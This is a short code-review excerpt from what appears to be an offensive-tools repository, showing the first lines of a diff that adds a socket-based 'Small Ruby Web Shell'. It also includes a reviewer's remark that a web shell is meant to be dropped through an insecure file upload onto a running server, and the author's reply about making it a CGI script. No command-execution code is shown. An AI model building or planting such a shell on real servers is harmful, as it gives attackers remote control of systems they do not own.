ruby/srwsh.rb

```diff
@@ -0,0 +1,44 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+# Small Ruby Web Shell
+# This a Ruby web shell written with sockets only
+
+require 'socket'
+require 'cgi'
+
+ipaddr, port = ARGV.size == 2 ? ARGV[0..] : ['localhost', 4000]
```

Comment:
For a webshell we expect a web server is already running so when one get a unsecure file upload one doesn't need to start a new web server.

Reply:
For sure, I'm doing some changes to run as cgi scripts...